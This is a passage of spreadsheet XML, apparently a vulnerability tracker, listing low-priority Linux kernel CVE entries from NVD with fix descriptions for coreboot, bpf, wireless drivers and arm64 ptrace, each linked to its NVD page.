The existing coreboot_table_populate() bounds checks limit individual
entries to the mapped length.  However, coreboot_table_probe() replaces
the platform resource length with header and table sizes supplied by
firmware before mapping the full table.
A malformed table can overflow the 32-bit size addition or advertise an
extent beyond the resource, causing the driver to map and parse memory
outside the resource.  A resource shorter than the fixed header is also
mapped as though it contained a complete header.
Reject resources shorter than the fixed header.  After validating the
signature, require a complete header, calculate the advertised extent
with overflow checking, and reject extents beyond the resource before
remapping the table.</t>
        </is>
      </c>
      <c r="T709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90341</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90342</t>
        </is>
      </c>
      <c r="D710" s="5" t="inlineStr"/>
      <c r="E710" s="5" t="inlineStr"/>
      <c r="F710" s="5" t="inlineStr"/>
      <c r="G710" s="5" t="inlineStr"/>
      <c r="H710" s="5" t="inlineStr"/>
      <c r="I710" s="5" t="inlineStr"/>
      <c r="J710" s="5" t="inlineStr"/>
      <c r="K710" s="5" t="inlineStr"/>
      <c r="L710" s="5" t="inlineStr"/>
      <c r="M710" s="5" t="inlineStr"/>
      <c r="N710" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O710" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P710" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q710" s="5" t="inlineStr"/>
      <c r="R710" s="5" t="inlineStr"/>
      <c r="S710" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix mmap_lock deadlock on arena lock failure
Reported by the Sashiko AI review.
arena_vm_fault() returns VM_FAULT_RETRY when it can't take
arena-&gt;spinlock, but it never took mmap_lock. The fault path assumes a
VM_FAULT_RETRY handler already dropped mmap_lock and re-takes it on the
retry, so mmap_lock gets taken twice and can deadlock:
	do_user_addr_fault()
	{
		fault = handle_mm_fault(...);   // calls arena_vm_fault()
		if (fault &amp; VM_FAULT_RETRY)
			goto retry;   // re-locks mmap_lock
		mmap_read_unlock(mm);
	}
Return VM_FAULT_SIGBUS instead, for two reasons:
1. We could keep VM_FAULT_RETRY, but then we'd have to drop the fault
   lock first and cap the retry ourselves, the way __folio_lock_or_retry()
   does.
2. A failed raw_res_spin_lock_irqsave() already means a possible deadlock
   was detected, so retrying just hits the same lock again.
So returning VM_FAULT_RETRY here is overkill.</t>
        </is>
      </c>
      <c r="T710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90342</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90343</t>
        </is>
      </c>
      <c r="D711" s="5" t="inlineStr"/>
      <c r="E711" s="5" t="inlineStr"/>
      <c r="F711" s="5" t="inlineStr"/>
      <c r="G711" s="5" t="inlineStr"/>
      <c r="H711" s="5" t="inlineStr"/>
      <c r="I711" s="5" t="inlineStr"/>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr"/>
      <c r="L711" s="5" t="inlineStr"/>
      <c r="M711" s="5" t="inlineStr"/>
      <c r="N711" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O711" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P711" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q711" s="5" t="inlineStr"/>
      <c r="R711" s="5" t="inlineStr"/>
      <c r="S711" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: cfg80211: stop PMSR before P2P and NAN teardown
PMSR request teardown must abort active measurements while the
wireless_dev is still present in the driver. cfg80211_leave_locked() and
cfg80211_stop_pd() already do this before invoking the driver's stop
callback, but cfg80211_stop_p2p_device() and cfg80211_stop_nan() do not.
Those helpers are also called directly by nl80211, rfkill shutdown, and
wireless_dev unregister paths. If one of these paths stops a P2P device
or NAN interface with a pending request, it removes the mac80211
subinterface from the driver first. Subsequent request cleanup cannot
reach the lower driver's abort callback, but cfg80211 frees the request
regardless. Driver state can then retain a stale request and use it when
it later reports a result.
Call cfg80211_pmsr_wdev_down() before stopping the P2P device or NAN
interface. This keeps lower-driver request state and cfg80211 request
ownership in sync for all of the helpers' callers.</t>
        </is>
      </c>
      <c r="T711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90343</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90344</t>
        </is>
      </c>
      <c r="D712" s="5" t="inlineStr"/>
      <c r="E712" s="5" t="inlineStr"/>
      <c r="F712" s="5" t="inlineStr"/>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="inlineStr"/>
      <c r="I712" s="5" t="inlineStr"/>
      <c r="J712" s="5" t="inlineStr"/>
      <c r="K712" s="5" t="inlineStr"/>
      <c r="L712" s="5" t="inlineStr"/>
      <c r="M712" s="5" t="inlineStr"/>
      <c r="N712" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O712" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P712" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q712" s="5" t="inlineStr"/>
      <c r="R712" s="5" t="inlineStr"/>
      <c r="S712" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mac80211: disconnect on CSA to channel 0
The refactor for the CSA parsing erroneously equates channel
zero and no information present, leading it to ignore a CSA
on an AP that advertises a switch to that (invalid) channel.
This leads to not disconnecting, which we should. For Intel
devices, this can lead to a firmware crash.
Fix this by using an int type for the channel number as well
as the opclass, and using a (negative) value that cannot be
encoded in the element to indicate it's not present.</t>
        </is>
      </c>
      <c r="T712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90344</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90345</t>
        </is>
      </c>
      <c r="D713" s="5" t="inlineStr"/>
      <c r="E713" s="5" t="inlineStr"/>
      <c r="F713" s="5" t="inlineStr"/>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="inlineStr"/>
      <c r="I713" s="5" t="inlineStr"/>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr"/>
      <c r="L713" s="5" t="inlineStr"/>
      <c r="M713" s="5" t="inlineStr"/>
      <c r="N713" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O713" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P713" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q713" s="5" t="inlineStr"/>
      <c r="R713" s="5" t="inlineStr"/>
      <c r="S713" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: brcmfmac: fix P2P action frame handling without device vif
Some P2P action frame paths assume the P2P device vif is always
available. That is not true when userspace sends non-P2P public action
frames through the primary interface, or when action-frame abort runs
after the P2P device vif has not been created.
Fall back to the primary vif when aborting an action frame without a P2P
device vif, and guard P2P device saved IE access before using it for
peer channel search.</t>
        </is>
      </c>
      <c r="T713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90345</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90346</t>
        </is>
      </c>
      <c r="D714" s="5" t="inlineStr"/>
      <c r="E714" s="5" t="inlineStr"/>
      <c r="F714" s="5" t="inlineStr"/>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="inlineStr"/>
      <c r="I714" s="5" t="inlineStr"/>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr"/>
      <c r="L714" s="5" t="inlineStr"/>
      <c r="M714" s="5" t="inlineStr"/>
      <c r="N714" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O714" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P714" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q714" s="5" t="inlineStr"/>
      <c r="R714" s="5" t="inlineStr"/>
      <c r="S714" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: nl80211: clean up color-change beacon data on errors
nl80211_color_change() calls nl80211_parse_beacon() for the beacon_next
template, which can allocate params.beacon_next.mbssid_ies and .rnr_ies.
A parsing failure returned directly instead of using the out: cleanup,
leaking any allocations completed before the error.
Allocate the nested attribute table before parsing beacon_next. Its
allocation failure can then return before beacon data exists, while a
later parsing failure uses out: to release the parsed data.</t>
        </is>
      </c>
      <c r="T714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90346</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90347</t>
        </is>
      </c>
      <c r="D715" s="5" t="inlineStr"/>
      <c r="E715" s="5" t="inlineStr"/>
      <c r="F715" s="5" t="inlineStr"/>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="inlineStr"/>
      <c r="I715" s="5" t="inlineStr"/>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr"/>
      <c r="L715" s="5" t="inlineStr"/>
      <c r="M715" s="5" t="inlineStr"/>
      <c r="N715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O715" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P715" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q715" s="5" t="inlineStr"/>
      <c r="R715" s="5" t="inlineStr"/>
      <c r="S715" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
arm64: ptrace: Keep 'orig_x0' in-sync with x0 on syscall entry
Commit e057b9477232 ("arm64: syscall: Ensure saved x0 is kept in-sync
with tracer updates") attempted to resolve a long-standing issue with
syscall entry tracing, where a tracer is able to manipulate the first
syscall argument without being subjected to seccomp or audit checking.
Unfortunately, that fix was incomplete [1], as it failed to update
'orig_x0' between a tracer updating x0 during a seccomp ptrace exit
(SECCOMP_RET_TRACE) and the seccomp filter being re-evaluated.
Rather than add hooks to the core seccomp code, instead move the
synchronisation code into the ptrace GPR and syscall setting code so
that 'orig_x0' is kept up to date with x0 whenever we're stopped on the
syscall entry path.</t>
        </is>
      </c>
      <c r="T715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90347</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90348</t>
        </is>
      </c>
      <c r="D716" s="5" t="inlineStr"/>
      <c r="E716" s="5" t="inlineStr"/>
      <c r="F716" s="5" t="inlineStr"/>
      <c r="G716" s="5" t="inlineStr"/>
      <c r="H716" s="5" t="inlineStr"/>
      <c r="I716" s="5" t="inlineStr"/>
      <c r="J716" s="5" t="inlineStr"/>
      <c r="K716" s="5" t="inlineStr"/>
      <c r="L716" s="5" t="inlineStr"/>
      <c r="M716" s="5" t="inlineStr"/>
      <c r="N716" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O716" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P716" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q716" s="5" t="inlineStr"/>
      <c r="R716" s="5" t="inlineStr"/>
      <c r="S716" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath10k: snoc: use memcpy_fromio() for MSA ramdump
On WCN3990/SNOC the MSA region is mapped with devm_memremap(MEMREMAP_WT).
On arm64 such a mapping is not Normal-cacheable, so unaligned accesses to
it are not permitted. ath10k_msa_dump_memory() copies the region with a
plain memcpy(), whose optimized __pi_memcpy_generic implementation issues
wide/unaligned loads. This triggers an alignment fault (FSC=0x21) Oops in
ath10k_snoc_fw_crashed_dump() while collecting the devcoredump:
  Unable to handle kernel paging request ... FSC=0x21: alignment fault
  pc : __pi_memcpy_generic
  lr : ath10k_snoc_fw_crashed_dump [ath10k_snoc]
The Oops both leaves the firmware RAM dump buffer zeroed (no dump is
captured) and crashes the kernel, which in turn breaks modem SSR
recovery.
Use memcpy_fromio(), which only performs accesses that are valid for such
a device-memory mapping. The generic memcpy_fromio() implementation aligns
the source before issuing word-sized reads and stores the destination with
put_unaligned(), so it is also safe for the coherent DMA allocation used on
the non-reserved-memory path. ath11k and ath12k use the same pattern
when copying target memory into crash dumps, so call it unconditionally
here too.
The MEMREMAP_WT pointer is a plain void *, so an explicit __iomem cast is
needed; use __force to keep sparse happy.
Tested-on: WCN3990 hw1.0 SNOC WLAN.HL.3.3.7.c5-00107-QCAHLSWMTPL-1</t>
        </is>
      </c>
      <c r="T716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90348</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90349</t>
        </is>
      </c>
      <c r="D717" s="5" t="inlineStr"/>
      <c r="E717" s="5" t="inlineStr"/>
      <c r="F717" s="5" t="inlineStr"/>
      <c r="G717" s="5" t="inlineStr"/>
      <c r="H717" s="5" t="inlineStr"/>
      <c r="I717" s="5" t="inlineStr"/>
      <c r="J717" s="5" t="inlineStr"/>
      <c r="K717" s="5" t="inlineStr"/>
      <c r="L717" s="5" t="inlineStr"/>
      <c r="M717" s="5" t="inlineStr"/>
      <c r="N717" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O717" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P717" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q717" s="5" t="inlineStr"/>
      <c r="R717" s="5" t="inlineStr"/>
      <c r="S717" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: fix out-of-bounds link array access in mt7996_tx()
When mac80211 leaves the link unspecified, mt7996_tx() substitutes the
primary link id of the station or vif. That value is
IEEE80211_LINK_UNSPECIFIED (0xf) until the first link has been added,
and it is then used unchecked to index vif-&gt;link_conf[],
mvif-&gt;mt76.link[] and sta-&gt;link[], all of which hold
IEEE80211_MLD_MAX_NUM_LINKS (15) entries.
Clamp the primary link id to the default link before using it, and use
the clamped value for the link_sta fallback as well.</t>
        </is>
      </c>
      <c r="T717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90349</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90350</t>
        </is>
      </c>
      <c r="D718" s="5" t="inlineStr"/>
      <c r="E718" s="5" t="inlineStr"/>
      <c r="F718" s="5" t="inlineStr"/>
      <c r="G718" s="5" t="inlineStr"/>
      <c r="H718" s="5" t="inlineStr"/>
      <c r="I718" s="5" t="inlineStr"/>
      <c r="J718" s="5" t="inlineStr"/>
      <c r="K718" s="5" t="inlineStr"/>
      <c r="L718" s="5" t="inlineStr"/>
      <c r="M718" s="5" t="inlineStr"/>
      <c r="N718" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O718" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P718" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q718" s="5" t="inlineStr"/>
      <c r="R718" s="5" t="inlineStr"/>
      <c r="S718" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: reject out-of-range link ids in mt76_vif_link()
mt76_vif_link() indexes mvif-&gt;link[] without validating link_id, but
callers pass mvif-&gt;deflink_id / msta-&gt;deflink_id, which hold
IEEE80211_LINK_UNSPECIFIED (0xf) until the first link has been added.
Since IEEE80211_MLD_MAX_NUM_LINKS is 15, that reads one element past the
end of the array, aliasing mt76_vif_data.offchannel_link.
Reachable via mt7996_set_tsf()/mt7996_offset_tsf() and
mt7996_net_fill_forward_path(). Bounds check link_id and return NULL,
matching mt7996_sta_link() and mt7996_sta_link_protected().</t>
        </is>
      </c>
      <c r="T718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90350</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90351</t>
        </is>
      </c>
      <c r="D719" s="5" t="inlineStr"/>
      <c r="E719" s="5" t="inlineStr"/>
      <c r="F719" s="5" t="inlineStr"/>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="inlineStr"/>
      <c r="I719" s="5" t="inlineStr"/>
      <c r="J719" s="5" t="inlineStr"/>
      <c r="K719" s="5" t="inlineStr"/>
      <c r="L719" s="5" t="inlineStr"/>
      <c r="M719" s="5" t="inlineStr"/>
      <c r="N719" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O719" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P719" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q719" s="5" t="inlineStr"/>
      <c r="R719" s="5" t="inlineStr"/>
      <c r="S719" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: do not attach hif2 WED when the main WED attach failed
If the WED attach for the primary PCIe function fails, the probe path
still attached wed_hif2 for the secondary function, leaving the device
in an inconsistent half-WED configuration that crashes later. The hif2
call also re-enabled hwrro_mode, which the failed primary attach had
just turned off.
Skip the hif2 WED setup when the primary WED device is not active.</t>
        </is>
      </c>
      <c r="T719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90351</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90352</t>
        </is>
      </c>
      <c r="D720" s="5" t="inlineStr"/>
      <c r="E720" s="5" t="inlineStr"/>
      <c r="F720" s="5" t="inlineStr"/>
      <c r="G720" s="5" t="inlineStr"/>
      <c r="H720" s="5" t="inlineStr"/>
      <c r="I720" s="5" t="inlineStr"/>
      <c r="J720" s="5" t="inlineStr"/>
      <c r="K720" s="5" t="inlineStr"/>
      <c r="L720" s="5" t="inlineStr"/>
      <c r="M720" s="5" t="inlineStr"/>
      <c r="N720" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O720" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P720" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q720" s="5" t="inlineStr"/>
      <c r="R720" s="5" t="inlineStr"/>
      <c r="S720" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: release hif2 reference on probe IRQ failure
The hif2 reference obtained by mt7915_pci_init_hif2() is only released on
error paths that key off dev-&gt;hif2, which is not assigned until after the
IRQ setup. If pci_alloc_irq_vectors() or the primary devm_request_irq()
fails, the reference leaks. Drop it explicitly on those paths via
mt7915_put_hif2().</t>
        </is>
      </c>
      <c r="T720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90352</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90353</t>
        </is>
      </c>
      <c r="D721" s="5" t="inlineStr"/>
      <c r="E721" s="5" t="inlineStr"/>
      <c r="F721" s="5" t="inlineStr"/>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="inlineStr"/>
      <c r="I721" s="5" t="inlineStr"/>
      <c r="J721" s="5" t="inlineStr"/>
      <c r="K721" s="5" t="inlineStr"/>
      <c r="L721" s="5" t="inlineStr"/>
      <c r="M721" s="5" t="inlineStr"/>
      <c r="N721" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O721" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P721" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q721" s="5" t="inlineStr"/>
      <c r="R721" s="5" t="inlineStr"/>
      <c r="S721" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: fix ext PHY use-after-free on register error path
After mt7915_register_ext_phy() succeeded, a failure of the main PHY
mt7915_init_debugfs() or mt7915_coredump_register() unwound through
free_phy2, which called ieee80211_free_hw() on the ext PHY hw while it
was still registered with mac80211, since mt76_unregister_device() only
unregisters the main hw. Unregister the ext PHY (thermal + phy + hw)
first and skip the redundant free.</t>
        </is>
      </c>
      <c r="T721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90353</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90354</t>
        </is>
      </c>
      <c r="D722" s="5" t="inlineStr"/>
      <c r="E722" s="5" t="inlineStr"/>
      <c r="F722" s="5" t="inlineStr"/>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="inlineStr"/>
      <c r="I722" s="5" t="inlineStr"/>
      <c r="J722" s="5" t="inlineStr"/>
      <c r="K722" s="5" t="inlineStr"/>
      <c r="L722" s="5" t="inlineStr"/>
      <c r="M722" s="5" t="inlineStr"/>
      <c r="N722" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O722" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P722" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q722" s="5" t="inlineStr"/>
      <c r="R722" s="5" t="inlineStr"/>
      <c r="S722" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: fix double hif2 init on the non-WED path
mt7915_pci_init_hif2() was called unconditionally and again inside the
WED-inactive branch. The helper increments the global hif_idx, writes the
PCIe RECOG_ID register and takes a get_device() reference via
mt7915_pci_get_hif2(), while removal only drops one reference. On non-WED
dual-hif hardware this double-incremented hif_idx, wrote RECOG_ID twice and
leaked a device reference. Only the call inside the WED-inactive branch is
correct; drop the unconditional one. hif2 is already initialised to NULL.</t>
        </is>
      </c>
      <c r="T722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90354</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90355</t>
        </is>
      </c>
      <c r="D723" s="5" t="inlineStr"/>
      <c r="E723" s="5" t="inlineStr"/>
      <c r="F723" s="5" t="inlineStr"/>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="inlineStr"/>
      <c r="I723" s="5" t="inlineStr"/>
      <c r="J723" s="5" t="inlineStr"/>
      <c r="K723" s="5" t="inlineStr"/>
      <c r="L723" s="5" t="inlineStr"/>
      <c r="M723" s="5" t="inlineStr"/>
      <c r="N723" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O723" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P723" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q723" s="5" t="inlineStr"/>
      <c r="R723" s="5" t="inlineStr"/>
      <c r="S723" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: clear stale link state on full reset
After a full chip reset, mac80211 reconfig replays interface, link and
channel context setup. mt7996_vif_link_add() short-circuits when the
link_id is still marked in mvif-&gt;valid_links, a state introduced for
postponing link teardown to interface removal. The reset path frees the
link structures without clearing those bits, so the replayed setup never
re-creates dev_info/bss_info/STA records in the restarted firmware and
never re-registers the link wcid, leaving the device inoperative.
The reset path also leaks every allocated MLD index: per-link indices
and the per-vif group/remap indices are re-allocated from scratch during
reconfig, but the old bits stay set in the masks, so repeated full
resets exhaust the index space.
Clear valid_links in the reset vif iterator and reset the MLD index
masks alongside the existing omac_mask clearing.</t>
        </is>
      </c>
      <c r="T723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90355</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90356</t>
        </is>
      </c>
      <c r="D724" s="5" t="inlineStr"/>
      <c r="E724" s="5" t="inlineStr"/>
      <c r="F724" s="5" t="inlineStr"/>
      <c r="G724" s="5" t="inlineStr"/>
      <c r="H724" s="5" t="inlineStr"/>
      <c r="I724" s="5" t="inlineStr"/>
      <c r="J724" s="5" t="inlineStr"/>
      <c r="K724" s="5" t="inlineStr"/>
      <c r="L724" s="5" t="inlineStr"/>
      <c r="M724" s="5" t="inlineStr"/>
      <c r="N724" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O724" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P724" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q724" s="5" t="inlineStr"/>
      <c r="R724" s="5" t="inlineStr"/>
      <c r="S724" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: free vif links after clearing wcid entries on full reset
